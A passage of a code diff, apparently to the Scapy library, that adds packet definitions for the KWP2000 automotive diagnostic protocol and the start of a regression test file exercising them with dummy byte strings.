'StopRoutineByLocalIdentifierPositiveResponse', + 0x73: 'RequestRoutineResultsByLocalIdentifierPositiveResponse', + 0x74: 'RequestDownloadPositiveResponse', + 0x75: 'RequestUploadPositiveResponse', + 0x76: 'TransferDataPositiveResponse', + 0x77: 'RequestTransferExitPositiveResponse', + 0x7B: 'WriteDataByLocalIdentifierPositiveResponse', + 0x7D: 'WriteMemoryByAddressPositiveResponse', + 0x7E: 'TesterPresentPositiveResponse', + 0xC5: 'ControlDTCSettingPositiveResponse', + 0xC6: 'ResponseOnEventPositiveResponse', + 0x7f: 'NegativeResponse'}) # type: Dict[int, str] + name = 'KWP' + fields_desc = [ + XByteEnumField('service', 0, services) + ] + + def answers(self, other): + # type: (Packet) -> bool + if not isinstance(other, type(self)): + return False + if self.service == 0x7f: + return self.payload.answers(other) + if self.service == (other.service + 0x40): + if isinstance(self.payload, NoPayload) or \ + isinstance(other.payload, NoPayload): + return len(self) <= len(other) + else: + return self.payload.answers(other.payload) + return False + + def hashret(self): + # type: () -> bytes + if self.service == 0x7f: + return struct.pack('B', self.requestServiceId) + else: + return struct.pack('B', self.service & ~0x40) + + +# ########################SDS################################### +class KWP_SDS(Packet): + diagnosticSessionTypes = ObservableDict({ + 0x81: 'defaultSession', + 0x85: 'programmingSession', + 0x89: 'standBySession', + 0x90: 'EcuPassiveSession', + 0x92: 'extendedDiagnosticSession'}) + name = 'StartDiagnosticSession' + fields_desc = [ + ByteEnumField('diagnosticSession', 0, diagnosticSessionTypes) + ] + + +bind_layers(KWP, KWP_SDS, service=0x10) + + +class KWP_SDSPR(Packet): + name = 'StartDiagnosticSessionPositiveResponse' + fields_desc = [ + ByteEnumField('diagnosticSession', 0, + KWP_SDS.diagnosticSessionTypes), + ] + + def answers(self, other): + # type: (Packet) -> int + return isinstance(other, KWP_SDS) and \ + other.diagnosticSession == self.diagnosticSession + + +bind_layers(KWP, KWP_SDSPR, service=0x50) + + +# ######################### KWP_ER ################################### +class KWP_ER(Packet): + resetModes = { + 0x00: 'reserved', + 0x01: 'powerOnReset', + 0x82: 'nonvolatileMemoryReset'} + name = 'ECUReset' + fields_desc = [ + ByteEnumField('resetMode', 0, resetModes) + ] + + +bind_layers(KWP, KWP_ER, service=0x11) + + +class KWP_ERPR(Packet): + name = 'ECUResetPositiveResponse' + + def answers(self, other): + # type: (Packet) -> int + return isinstance(other, KWP_ER) + + +bind_layers(KWP, KWP_ERPR, service=0x51) + + +# ######################### KWP_SA ################################### +class KWP_SA(Packet): + name = 'SecurityAccess' + fields_desc = [ + ByteField('accessMode', 0), + ConditionalField(StrField('key', b""), + lambda pkt: pkt.accessMode % 2 == 0) + ] + + +bind_layers(KWP, KWP_SA, service=0x27) + + +class KWP_SAPR(Packet): + name = 'SecurityAccessPositiveResponse' + fields_desc = [ + ByteField('accessMode', 0), + ConditionalField(StrField('seed', b""), + lambda pkt: pkt.accessMode % 2 == 1), + ] + + def answers(self, other): + # type: (Packet) -> int + return isinstance(other, KWP_SA) \ + and other.accessMode == self.accessMode + + +bind_layers(KWP, KWP_SAPR, service=0x67) + + +# ######################### KWP_IOCBLI ################################### +class KWP_IOCBLI(Packet): + name = 'InputOutputControlByLocalIdentifier' + inputOutputControlParameters = { + 0x00: "Return Control to ECU", + 0x01: "Report Current State", + 0x04: "Reset to Default", + 0x05: "Freeze Current State", + 0x07: "Short Term Adjustment", + 0x08: "Long Term Adjustment" + } + fields_desc = [ + XByteField('localIdentifier', 0), + XByteEnumField('inputOutputControlParameter', 0, + inputOutputControlParameters), + StrField('controlState', b"", fmt="B") + ] + + +bind_layers(KWP, KWP_IOCBLI, service=0x30) + + +class KWP_IOCBLIPR(Packet): + name = 'InputOutputControlByLocalIdentifierPositiveResponse' + fields_desc = [ + XByteField('localIdentifier', 0), + XByteEnumField('inputOutputControlParameter', 0, + KWP_IOCBLI.inputOutputControlParameters), + StrField('controlState', b"", fmt="B") + ] + + def answers(self, other): + # type: (Packet) -> int + return isinstance(other, KWP_IOCBLI) \ + and other.localIdentifier == self.localIdentifier + + +bind_layers(KWP, KWP_IOCBLIPR, service=0x70) + + +# ######################### KWP_DNMT ################################### +class KWP_DNMT(Packet): + responseTypes = { + 0x01: 'responseRequired', + 0x02: 'noResponse', + } + name = 'DisableNormalMessageTransmission' + fields_desc = [ + ByteEnumField('responseRequired', 0, responseTypes) + ] + + +bind_layers(KWP, KWP_DNMT, service=0x28) + + +class KWP_DNMTPR(Packet): + name = 'DisableNormalMessageTransmissionPositiveResponse' + + def answers(self, other): + # type: (Packet) -> int + return isinstance(other, KWP_DNMT) + + +bind_layers(KWP, KWP_DNMTPR, service=0x68) + + +# ######################### KWP_ENMT ################################### +class KWP_ENMT(Packet): + responseTypes = { + 0x01: 'responseRequired', + 0x02: 'noResponse', + } + name = 'EnableNormalMessageTransmission' + fields_desc = [ + ByteEnumField('responseRequired', 1, responseTypes) + ] + + +bind_layers(KWP, KWP_ENMT, service=0x29) + + +class KWP_ENMTPR(Packet): + name = 'EnableNormalMessageTransmissionPositiveResponse' + + def answers(self, other): + # type: (Packet) -> int + return isinstance(other, KWP_DNMT) + + +bind_layers(KWP, KWP_ENMTPR, service=0x69) + + +# ######################### KWP_TP ################################### +class KWP_TP(Packet): + responseTypes = { + 0x01: 'responseRequired', + 0x02: 'noResponse', + } + name = 'TesterPresent' + fields_desc = [ + ByteEnumField('responseRequired', 1, responseTypes) + ] + + +bind_layers(KWP, KWP_TP, service=0x3E) + + +class KWP_TPPR(Packet): + name = 'TesterPresentPositiveResponse' + + def answers(self, other): + # type: (Packet) -> int + return isinstance(other, KWP_TP) + + +bind_layers(KWP, KWP_TPPR, service=0x7E) + + +# ######################### KWP_CDTCS ################################### +class KWP_CDTCS(Packet): + responseTypes = { + 0x01: 'responseRequired', + 0x02: 'noResponse', + } + DTCGroups = { + 0x0000: 'allPowertrainDTCs', + 0x4000: 'allChassisDTCs', + 0x8000: 'allBodyDTCs', + 0xC000: 'allNetworkDTCs', + 0xFF00: 'allDTCs' + } + DTCSettingModes = { + 0: 'Reserved', + 1: 'on', + 2: 'off' + } + name = 'ControlDTCSetting' + fields_desc = [ + ByteEnumField('responseRequired', 1, responseTypes), + XShortEnumField('groupOfDTC', 0, DTCGroups), + ByteEnumField('DTCSettingMode', 0, DTCSettingModes), + ] + + +bind_layers(KWP, KWP_CDTCS, service=0x85) + + +class KWP_CDTCSPR(Packet): + name = 'ControlDTCSettingPositiveResponse' + + def answers(self, other): + # type: (Packet) -> int + return isinstance(other, KWP_CDTCS) + + +bind_layers(KWP, KWP_CDTCSPR, service=0xC5) + + +# ######################### KWP_ROE ################################### +class KWP_ROE(Packet): + responseTypes = { + 0x01: 'responseRequired', + 0x02: 'noResponse', + } + eventWindowTimes = { + 0x00: 'reserved', + 0x01: 'testerPresentRequired', + 0x02: 'infiniteTimeToResponse', + 0x80: 'noEventWindow' + } + eventTypes = { + 0x80: 'reportActivatedEvents', + 0x81: 'stopResponseOnEvent', + 0x82: 'onNewDTC', + 0x83: 'onTimerInterrupt', + 0x84: 'onChangeOfRecordValue', + 0xA0: 'onComparisonOfValues' + } + name = 'ResponseOnEvent' + fields_desc = [ + ByteEnumField('responseRequired', 1, responseTypes), + ByteEnumField('eventWindowTime', 0, eventWindowTimes), + ByteEnumField('eventType', 0, eventTypes), + ByteField('eventParameter', 0), + ByteEnumField('serviceToRespond', 0, KWP.services), + ByteField('serviceParameter', 0) + ] + + +bind_layers(KWP, KWP_ROE, service=0x86) + + +class KWP_ROEPR(Packet): + name = 'ResponseOnEventPositiveResponse' + fields_desc = [ + ByteField("numberOfActivatedEvents", 0), + ByteEnumField('eventWindowTime', 0, KWP_ROE.eventWindowTimes), + ByteEnumField('eventType', 0, KWP_ROE.eventTypes), + ] + + def answers(self, other): + # type: (Packet) -> int + return isinstance(other, KWP_ROE) \ + and other.eventType == self.eventType + + +bind_layers(KWP, KWP_ROEPR, service=0xC6) + + +# ######################### KWP_RDBLI ################################### +class KWP_RDBLI(Packet): + localIdentifiers = ObservableDict({ + 0xE0: "Development Data", + 0xE1: "ECU Serial Number", + 0xE2: "DBCom Data", + 0xE3: "Operating System Version", + 0xE4: "Ecu Reprogramming Identification", + 0xE5: "Vehicle Information", + 0xE6: "Flash Info 1", + 0xE7: "Flash Info 2", + 0xE8: "System Diagnostic general parameter data", + 0xE9: "System Diagnostic global parameter data", + 0xEA: "Ecu Configuration", + 0xEB: "Diagnostic Protocol Information" + }) + name = 'ReadDataByLocalIdentifier' + fields_desc = [ + XByteEnumField('recordLocalIdentifier', 0, localIdentifiers) + ] + + +bind_layers(KWP, KWP_RDBLI, service=0x21) + + +class KWP_RDBLIPR(Packet): + name = 'ReadDataByLocalIdentifierPositiveResponse' + fields_desc = [ + XByteEnumField('recordLocalIdentifier', 0, KWP_RDBLI.localIdentifiers) + ] + + def answers(self, other): + # type: (Packet) -> int + return isinstance(other, KWP_RDBLI) \ + and self.recordLocalIdentifier == other.recordLocalIdentifier + + +bind_layers(KWP, KWP_RDBLIPR, service=0x61) + + +# ######################### KWP_WDBLI ################################### +class KWP_WDBLI(Packet): + name = 'WriteDataByLocalIdentifier' + fields_desc = [ + XByteEnumField('recordLocalIdentifier', 0, KWP_RDBLI.localIdentifiers) + ] + + +bind_layers(KWP, KWP_WDBLI, service=0x3B) + + +class KWP_WDBLIPR(Packet): + name = 'WriteDataByLocalIdentifierPositiveResponse' + fields_desc = [ + XByteEnumField('recordLocalIdentifier', 0, KWP_RDBLI.localIdentifiers) + ] + + def answers(self, other): + # type: (Packet) -> int + return isinstance(other, KWP_WDBLI) \ + and self.recordLocalIdentifier == other.recordLocalIdentifier + + +bind_layers(KWP, KWP_WDBLIPR, service=0x7B) + + +# ######################### KWP_RDBI ################################### +class KWP_RDBI(Packet): + dataIdentifiers = ObservableDict() + name = 'ReadDataByIdentifier' + fields_desc = [ + XShortEnumField('identifier', 0, dataIdentifiers) + ] + + +bind_layers(KWP, KWP_RDBI, service=0x22) + + +class KWP_RDBIPR(Packet): + name = 'ReadDataByIdentifierPositiveResponse' + fields_desc = [ + XShortEnumField('identifier', 0, KWP_RDBI.dataIdentifiers), + ] + + def answers(self, other): + # type: (Packet) -> int + return isinstance(other, KWP_RDBI) \ + and self.identifier == other.identifier + + +bind_layers(KWP, KWP_RDBIPR, service=0x62) + + +# ######################### KWP_RMBA ################################### +class KWP_RMBA(Packet): + name = 'ReadMemoryByAddress' + fields_desc = [ + X3BytesField('memoryAddress', 0), + ByteField('memorySize', 0) + ] + + +bind_layers(KWP, KWP_RMBA, service=0x23) + + +class KWP_RMBAPR(Packet): + name = 'ReadMemoryByAddressPositiveResponse' + fields_desc = [ + StrField('dataRecord', b"", fmt="B") + ] + + def answers(self, other): + # type: (Packet) -> int + return isinstance(other, KWP_RMBA) + + +bind_layers(KWP, KWP_RMBAPR, service=0x63) + + +# ######################### KWP_DDLI ################################### +# TODO: Implement correct interpretation here, +# instead of using just the dataRecord +class KWP_DDLI(Packet): + name = 'DynamicallyDefineLocalIdentifier' + definitionModes = {0x1: "defineByLocalIdentifier", + 0x2: "defineByMemoryAddress", + 0x3: "defineByIdentifier", + 0x4: "clearDynamicallyDefinedLocalIdentifier"} + fields_desc = [ + XByteField('dynamicallyDefineLocalIdentifier', 0), + ByteEnumField('definitionMode', 0, definitionModes), + StrField('dataRecord', b"", fmt="B") + ] + + +bind_layers(KWP, KWP_DDLI, service=0x2C) + + +class KWP_DDLIPR(Packet): + name = 'DynamicallyDefineLocalIdentifierPositiveResponse' + fields_desc = [ + XByteField('dynamicallyDefineLocalIdentifier', 0) + ] + + def answers(self, other): + # type: (Packet) -> int + return isinstance(other, KWP_DDLI) and \ + other.dynamicallyDefineLocalIdentifier == self.dynamicallyDefineLocalIdentifier # noqa: E501 + + +bind_layers(KWP, KWP_DDLIPR, service=0x6C) + + +# ######################### KWP_WDBI ################################### +class KWP_WDBI(Packet): + name = 'WriteDataByIdentifier' + fields_desc = [ + XShortEnumField('identifier', 0, KWP_RDBI.dataIdentifiers) + ] + + +bind_layers(KWP, KWP_WDBI, service=0x2E) + + +class KWP_WDBIPR(Packet): + name = 'WriteDataByIdentifierPositiveResponse' + fields_desc = [ + XShortEnumField('identifier', 0, KWP_RDBI.dataIdentifiers), + ] + + def answers(self, other): + # type: (Packet) -> int + return isinstance(other, KWP_WDBI) \ + and other.identifier == self.identifier + + +bind_layers(KWP, KWP_WDBIPR, service=0x6E) + + +# ######################### KWP_WMBA ################################### +class KWP_WMBA(Packet): + name = 'WriteMemoryByAddress' + fields_desc = [ + X3BytesField('memoryAddress', 0), + ByteField('memorySize', 0), + StrField('dataRecord', b'', fmt="B") + ] + + +bind_layers(KWP, KWP_WMBA, service=0x3D) + + +class KWP_WMBAPR(Packet): + name = 'WriteMemoryByAddressPositiveResponse' + fields_desc = [ + X3BytesField('memoryAddress', 0) + ] + + def answers(self, other): + # type: (Packet) -> int + return isinstance(other, KWP_WMBA) and \ + other.memoryAddress == self.memoryAddress + + +bind_layers(KWP, KWP_WMBAPR, service=0x7D) + + +# ######################### KWP_CDI ################################### +class KWP_CDI(Packet): + DTCGroups = { + 0x0000: 'allPowertrainDTCs', + 0x4000: 'allChassisDTCs', + 0x8000: 'allBodyDTCs', + 0xC000: 'allNetworkDTCs', + 0xFF00: 'allDTCs' + } + name = 'ClearDiagnosticInformation' + fields_desc = [ + XShortEnumField('groupOfDTC', 0, DTCGroups) + ] + + +bind_layers(KWP, KWP_CDI, service=0x14) + + +class KWP_CDIPR(Packet): + name = 'ClearDiagnosticInformationPositiveResponse' + + fields_desc = [ + XShortEnumField('groupOfDTC', 0, KWP_CDI.DTCGroups) + ] + + def answers(self, other): + # type: (Packet) -> int + return isinstance(other, KWP_CDI) and \ + self.groupOfDTC == other.groupOfDTC + + +bind_layers(KWP, KWP_CDIPR, service=0x54) + + +# ######################### KWP_RSODTC ################################### +class KWP_RSODTC(Packet): + name = 'ReadStatusOfDiagnosticTroubleCodes' + fields_desc = [ + XShortEnumField('groupOfDTC', 0, KWP_CDI.DTCGroups) + ] + + +bind_layers(KWP, KWP_RSODTC, service=0x17) + + +class KWP_RSODTCPR(Packet): + name = 'ReadStatusOfDiagnosticTroubleCodesPositiveResponse' + + fields_desc = [ + ByteField('numberOfDTC', 0), + ] + + def answers(self, other): + # type: (Packet) -> int + return isinstance(other, KWP_RSODTC) + + +bind_layers(KWP, KWP_RSODTCPR, service=0x57) + + +# ######################### KWP_RECUI ################################### +class KWP_RECUI(Packet): + name = 'ReadECUIdentification' + localIdentifiers = ObservableDict({ + 0x86: "DCS ECU Identification", + 0x87: "DCX / MMC ECU Identification", + 0x88: "VIN (Original)", + 0x89: "Diagnostic Variant Code", + 0x90: "VIN (Current)", + 0x96: "Calibration Identification", + 0x97: "Calibration Verification Number", + 0x9A: "ECU Code Fingerprint", + 0x98: "ECU Data Fingerprint", + 0x9C: "ECU Code Software Identification", + 0x9D: "ECU Data Software Identification", + 0x9E: "ECU Boot Software Identification", + 0x9F: "ECU Boot Fingerprint" + }) + fields_desc = [ + XByteEnumField('localIdentifier', 0, localIdentifiers) + ] + + +bind_layers(KWP, KWP_RECUI, service=0x1A) + + +class KWP_RECUIPR(Packet): + name = 'ReadECUIdentificationPositiveResponse' + + fields_desc = [ + XByteEnumField('localIdentifier', 0, KWP_RECUI.localIdentifiers) + ] + + def answers(self, other): + # type: (Packet) -> int + return isinstance(other, KWP_RECUI) and \ + self.localIdentifier == other.localIdentifier + + +bind_layers(KWP, KWP_RECUIPR, service=0x5A) + + +# ######################### KWP_SRBLI ################################### +class KWP_SRBLI(Packet): + routineLocalIdentifiers = ObservableDict({ + 0xE0: "FlashEraseRoutine", + 0xE1: "FlashCheckRoutine", + 0xE2: "Tell-TaleRetentionStack", + 0xE3: "RequestDTCsFromShadowErrorMemory", + 0xE4: "RequestEnvironmentDataFromShadowErrorMemory", + 0xE5: "RequestEventInformation", + 0xE6: "RequestEventEnvironmentData", + 0xE7: "RequestSoftwareModuleInformation", + 0xE8: "ClearTell-TaleRetentionStack", + 0xE9: "ClearEventInformation" + }) + name = 'StartRoutineByLocalIdentifier' + fields_desc = [ + XByteEnumField('routineLocalIdentifier', 0, routineLocalIdentifiers) + ] + + +bind_layers(KWP, KWP_SRBLI, service=0x31) + + +class KWP_SRBLIPR(Packet): + name = 'StartRoutineByLocalIdentifierPositiveResponse' + fields_desc = [ + XByteEnumField('routineLocalIdentifier', 0, + KWP_SRBLI.routineLocalIdentifiers) + ] + + def answers(self, other): + # type: (Packet) -> int + return isinstance(other, KWP_SRBLI) \ + and other.routineLocalIdentifier == self.routineLocalIdentifier + + +bind_layers(KWP, KWP_SRBLIPR, service=0x71) + + +# ######################### KWP_STRBLI ################################### +class KWP_STRBLI(Packet): + name = 'StopRoutineByLocalIdentifier' + fields_desc = [ + XByteEnumField('routineLocalIdentifier', 0, + KWP_SRBLI.routineLocalIdentifiers) + ] + + +bind_layers(KWP, KWP_STRBLI, service=0x32) + + +class KWP_STRBLIPR(Packet): + name = 'StopRoutineByLocalIdentifierPositiveResponse' + fields_desc = [ + XByteEnumField('routineLocalIdentifier', 0, + KWP_SRBLI.routineLocalIdentifiers) + ] + + def answers(self, other): + # type: (Packet) -> int + return isinstance(other, KWP_STRBLI) \ + and other.routineLocalIdentifier == self.routineLocalIdentifier + + +bind_layers(KWP, KWP_STRBLIPR, service=0x72) + + +# ######################### KWP_RRRBLI ################################### +class KWP_RRRBLI(Packet): + name = 'RequestRoutineResultsByLocalIdentifier' + fields_desc = [ + XByteEnumField('routineLocalIdentifier', 0, + KWP_SRBLI.routineLocalIdentifiers) + ] + + +bind_layers(KWP, KWP_RRRBLI, service=0x33) + + +class KWP_RRRBLIPR(Packet): + name = 'RequestRoutineResultsByLocalIdentifierPositiveResponse' + fields_desc = [ + XByteEnumField('routineLocalIdentifier', 0, + KWP_SRBLI.routineLocalIdentifiers) + ] + + def answers(self, other): + # type: (Packet) -> int + return isinstance(other, KWP_RRRBLI) \ + and other.routineLocalIdentifier == self.routineLocalIdentifier + + +bind_layers(KWP, KWP_RRRBLIPR, service=0x73) + + +# ######################### KWP_RD ################################### +class KWP_RD(Packet): + name = 'RequestDownload' + fields_desc = [ + X3BytesField('memoryAddress', 0), + BitField('compression', 0, 4), + BitField('encryption', 0, 4), + X3BytesField('uncompressedMemorySize', 0) + ] + + +bind_layers(KWP, KWP_RD, service=0x34) + + +class KWP_RDPR(Packet): + name = 'RequestDownloadPositiveResponse' + fields_desc = [ + StrField('maxNumberOfBlockLength', b"", fmt="B"), + ] + + def answers(self, other): + # type: (Packet) -> int + return isinstance(other, KWP_RD) + + +bind_layers(KWP, KWP_RDPR, service=0x74) + + +# ######################### KWP_RU ################################### +class KWP_RU(Packet): + name = 'RequestUpload' + fields_desc = [ + X3BytesField('memoryAddress', 0), + BitField('compression', 0, 4), + BitField('encryption', 0, 4), + X3BytesField('uncompressedMemorySize', 0) + ] + + +bind_layers(KWP, KWP_RU, service=0x35) + + +class KWP_RUPR(Packet): + name = 'RequestUploadPositiveResponse' + fields_desc = [ + StrField('maxNumberOfBlockLength', b"", fmt="B"), + ] + + def answers(self, other): + # type: (Packet) -> int + return isinstance(other, KWP_RU) + + +bind_layers(KWP, KWP_RUPR, service=0x75) + + +# ######################### KWP_TD ################################### +class KWP_TD(Packet): + name = 'TransferData' + fields_desc = [ + ByteField('blockSequenceCounter', 0), + StrField('transferDataRequestParameter', b"", fmt="B") + ] + + +bind_layers(KWP, KWP_TD, service=0x36) + + +class KWP_TDPR(Packet): + name = 'TransferDataPositiveResponse' + fields_desc = [ + ByteField('blockSequenceCounter', 0), + StrField('transferDataRequestParameter', b"", fmt="B") + ] + + def answers(self, other): + # type: (Packet) -> int + return isinstance(other, KWP_TD) \ + and other.blockSequenceCounter == self.blockSequenceCounter + + +bind_layers(KWP, KWP_TDPR, service=0x76) + + +# ######################### KWP_RTE ################################### +class KWP_RTE(Packet): + name = 'RequestTransferExit' + fields_desc = [ + StrField('transferDataRequestParameter', b"", fmt="B") + ] + + +bind_layers(KWP, KWP_RTE, service=0x37) + + +class KWP_RTEPR(Packet): + name = 'RequestTransferExitPositiveResponse' + fields_desc = [ + StrField('transferDataRequestParameter', b"", fmt="B") + ] + + def answers(self, other): + # type: (Packet) -> int + return isinstance(other, KWP_RTE) + + +bind_layers(KWP, KWP_RTEPR, service=0x77) + + +# ######################### KWP_NR ################################### +class KWP_NR(Packet): + negativeResponseCodes = { + 0x00: 'positiveResponse', + 0x10: 'generalReject', + 0x11: 'serviceNotSupported', + 0x12: 'subFunctionNotSupported-InvalidFormat', + 0x21: 'busyRepeatRequest', + 0x22: 'conditionsNotCorrect-RequestSequenceError', + 0x23: 'routineNotComplete', + 0x31: 'requestOutOfRange', + 0x33: 'securityAccessDenied-SecurityAccessRequested', + 0x35: 'invalidKey', + 0x36: 'exceedNumberOfAttempts', + 0x37: 'requiredTimeDelayNotExpired', + 0x40: 'downloadNotAccepted', + 0x50: 'uploadNotAccepted', + 0x71: 'transferSuspended', + 0x78: 'requestCorrectlyReceived-ResponsePending', + 0x80: 'subFunctionNotSupportedInActiveDiagnosticSession', + 0x9A: 'dataDecompressionFailed', + 0x9B: 'dataDecryptionFailed', + 0xA0: 'EcuNotResponding', + 0xA1: 'EcuAddressUnknown' + } + name = 'NegativeResponse' + fields_desc = [ + XByteEnumField('requestServiceId', 0, KWP.services), + ByteEnumField('negativeResponseCode', 0, negativeResponseCodes) + ] + + def answers(self, other): + # type: (Packet) -> int + return self.requestServiceId == other.service and \ + (self.negativeResponseCode != 0x78 or + conf.contribs['KWP']['treat-response-pending-as-answer']) + + +bind_layers(KWP, KWP_NR, service=0x7f) + + +# ################################################################## +# ######################## UTILS ################################### +# ################################################################## + +class KWP_TesterPresentSender(PeriodicSenderThread): + def __init__(self, sock, pkt=KWP() / KWP_TP(), interval=2): + # type: (Any, _PacketIterable, float) -> None + """ Thread that sends TesterPresent packets periodically + + :param sock: socket where packet is sent periodically + :param pkt: packet to send + :param interval: interval between two packets + """ + PeriodicSenderThread.__init__(self, sock, pkt, interval) + + def run(self): + # type: () -> None + while not self._stopped.is_set(): + for p in self._pkts: + self._socket.sr1(p, timeout=0.3, verbose=False) + time.sleep(self._interval) diff --git a/test/contrib/automotive/kwp.uts b/test/contrib/automotive/kwp.uts new file mode 100644 index 00000000000..d525b8554e6 --- /dev/null +++ b/test/contrib/automotive/kwp.uts @@ -0,0 +1,509 @@ +% Regression tests for the KWP2000 layer + +# More information at http://www.secdev.org/projects/UTscapy/ + + +############ +############ + ++ Basic operations + += Load module +load_contrib("automotive.kwp", globals_dict=globals()) + += Check if positive response answers + +sds = KWP(b'\x10') +sdspr = KWP(b'\x50') +assert sdspr.answers(sds) + += Check hashret +sds.hashret() == sdspr.hashret() + += Check if negative response answers + +sds = KWP(b'\x10') +neg = KWP(b'\x7f\x10') +assert neg.answers(sds) + += CHECK hashret NEG +sds.hashret() == neg.hashret() + += Check if negative response answers + +conf.contribs['KWP']['treat-response-pending-as-answer'] = False + +sds = KWP(b'\x10') +neg = KWP(b'\x7f\x10\x78') +assert not neg.answers(sds) + +conf.contribs['KWP']['treat-response-pending-as-answer'] = True + += CHECK hashret NEG +sds.hashret() == neg.hashret() + += Check if negative response answers not + +sds = KWP(b'\x10') +neg = KWP(b'\x7f\x11') +assert not neg.answers(sds) + += Check if positive response answers not + +sds = KWP(b'\x10') +somePacket = KWP(b'\x49') +assert not somePacket.answers(sds) + += Check KWP_SDS + +sds = KWP(b'\x10\x01') +assert sds.service == 0x10 +assert sds.diagnosticSession == 0x01 + += Check KWP_SDS + +sds = KWP()/KWP_SDS(b'\x01') +assert sds.service == 0x10 +assert sds.diagnosticSession == 0x01 + += Check KWP_SDSPR + +sdspr = KWP(b'\x50\x02beef') +assert sdspr.service == 0x50 +assert sdspr.diagnosticSession == 0x02 + +assert not sdspr.answers(sds) + += Check KWP_SDSPR + +sdspr = KWP()/KWP_SDSPR(b'\x01beef') +assert sdspr.service == 0x50 +assert sdspr.diagnosticSession == 0x01 + +assert sdspr.answers(sds) + += Check KWP_SDS + +sds = KWP()/KWP_SDS(b'\x01') +assert sds.service == 0x10 +assert sds.diagnosticSession == 0x01 + += Check KWP_SDSPR + +sdspr = KWP()/KWP_SDSPR(b'\x01beef') +assert sdspr.service == 0x50 +assert sdspr.diagnosticSession == 0x01 + +assert sdspr.answers(sds) + += Check KWP_ER + +er = KWP(b'\x11\x01') +assert er.service == 0x11 +assert er.resetMode == 0x01 + += Check KWP_ER + +er = KWP()/KWP_ER(resetMode="powerOnReset") +assert er.service == 0x11 +assert er.resetMode == 0x01 + += Check KWP_ERPR + +erpr = KWP(b'\x51') +assert erpr.service == 0x51 + +assert erpr.answers(er) + += Check KWP_SA + +sa = KWP(b'\x27\x00c0ffee') +assert sa.service == 0x27 +assert sa.accessMode == 0x0 +assert sa.key == b'c0ffee' + += Check KWP_SAPR + +sapr = KWP(b'\x67') +assert sapr.service == 0x67 + +assert sapr.answers(sa) + += Check KWP_SA + +sa = KWP(b'\x27\x01') +assert sa.service == 0x27 +assert sa.accessMode == 0x1 + += Check KWP_SAPR + +sapr = KWP(b'\x67\x01c0ffee') +assert sapr.service == 0x67 +assert sapr.accessMode == 0x1 +assert sapr.seed == b'c0ffee' + +assert sapr.answers(sa) + += Check KWP_SA + +sa = KWP(b'\x27\x00c0ffee') +assert sa.service == 0x27 +assert sa.accessMode == 0x0 +assert sa.key == b'c0ffee' + += Check KWP_SA + +sa = KWP(b'\x27\x01c0ffee') +assert sa.service == 0x27 +assert sa.accessMode == 0x1 + += Check KWP_SAPR + +sapr = KWP(b'\x67\x01c0ffee') +assert sapr.service == 0x67 +assert sapr.accessMode == 0x1 +assert sapr.seed == b'c0ffee' + + += Check KWP_DNT + +cc = KWP(b'\x28\x01') +assert cc.service == 0x28 +assert cc.responseRequired == 0x1 + += Check KWP_DNMTPR + +ccpr = KWP(b'\x68') +assert ccpr.service == 0x68 +assert ccpr.answers(cc) + += Check KWP_DNMTPR + +ccpr = KWP(b'\x68abcd') +assert ccpr.service == 0x68 +assert ccpr.answers(cc) + +assert (KWP()/KWP_DNMTPR()).answers(cc) + += Check KWP_TP + +tp = KWP(b'\x3E\x01') +assert tp.service == 0x3e +assert tp.responseRequired == 1 + += Check KWP_TPPR + +tppr = KWP(b'\x7E') +assert tppr.service == 0x7e + +assert tppr.answers(tp) + +assert (KWP()/KWP_TPPR()).answers(tp) + += Check KWP_CDTCS + +cdtcs = KWP(b'\x85\x01\x40\x00\x01') +assert cdtcs.service == 0x85 +assert cdtcs.responseRequired == 1 +assert cdtcs.groupOfDTC == 0x4000 +assert cdtcs.DTCSettingMode == 1 + += Check KWP_CDTCSPR + +cdtcspr = KWP(b'\xC5\x00') +assert cdtcspr.service == 0xC5 + +assert cdtcspr.answers(cdtcs) + += Check KWP_ROE + +roe = KWP(b'\x86\x01\x10\x00') +assert roe.service == 0x86 +assert roe.responseRequired == 1 +assert roe.eventType == 0 +assert roe.eventWindowTime == 16 + += Check KWP_ROEPR + +roepr = KWP(b'\xC6\x00\x01') +assert roepr.service == 0xC6 +assert roepr.numberOfActivatedEvents == 0 +assert roepr.eventType == 0 + +assert roepr.answers(roe) + += Check KWP_RDBI + +rdbi = KWP(b'\x22\x01\x02') +assert rdbi.service == 0x22 +assert rdbi.identifier == 0x0102 + += Build KWP_RDBI + +rdbi = KWP()/KWP_RDBI(identifier=0x102) +assert rdbi.service == 0x22 +assert rdbi.identifier == 0x0102 +assert bytes(rdbi) == b'\x22\x01\x02' + += Check KWP_RDBI2 + +rdbi = KWP(b'\x22\x01\x02') +assert rdbi.service == 0x22 +assert rdbi.identifier == 0x0102 +assert raw(rdbi) == b'\x22\x01\x02' + += Build KWP_RDBI2 + +rdbi = KWP()/KWP_RDBI(identifier=0x304) +assert rdbi.service == 0x22 +assert rdbi.identifier == 0x0304 +assert raw(rdbi) == b'\x22\x03\x04' + += Test observable dict used in KWP_RDBI, setter + +KWP_RDBI.dataIdentifiers[0x102] = "turbo" +KWP_RDBI.dataIdentifiers[0x103] = "fullspeed" + +rdbi = KWP()/KWP_RDBI(identifier=0x102) + +assert "turbo" in plain_str(repr(rdbi)) + +rdbi = KWP()/KWP_RDBI(identifier=0x103) + +assert "fullspeed" in plain_str(repr(rdbi)) + += Test observable dict used in KWP_RDBI, deleter + +KWP_RDBI.dataIdentifiers[0x102] = "turbo" + +rdbi = KWP()/KWP_RDBI(identifier=0x102) +assert "turbo" in plain_str(repr(rdbi)) + +del KWP_RDBI.dataIdentifiers[0x102] +KWP_RDBI.dataIdentifiers[0x103] = "slowspeed" + +rdbi = KWP()/KWP_RDBI(identifier=0x102) + +assert "turbo" not in plain_str(repr(rdbi)) + +rdbi = KWP()/KWP_RDBI(identifier=0x103) + +assert "slowspeed" in plain_str(repr(rdbi)) + += Check KWP_RDBIPR + +rdbipr = KWP(b'\x62\x01\x03dieselgate') +assert rdbipr.service == 0x62 +assert rdbipr.identifier == 0x0103 +assert rdbipr.load == b'dieselgate' + +assert rdbipr.answers(rdbi) + += Check KWP_RMBA + +rmba = KWP(b'\x23\x11\x02\x02\x11') +assert rmba.service == 0x23 +assert rmba.memoryAddress == 0x110202 +assert rmba.memorySize == 17 + += Check KWP_RMBAPR + +rmbapr = KWP(b'\x63muchData') +assert rmbapr.service == 0x63 +assert rmbapr.dataRecord == b'muchData' + +assert rmbapr.answers(rmba) + += Check KWP_DDLI + +dddi = KWP(b'\x2c\x12\x44coffee') +assert dddi.service == 0x2c +assert dddi.dynamicallyDefineLocalIdentifier == 0x12 +assert dddi.definitionMode == 0x44 +assert dddi.dataRecord == 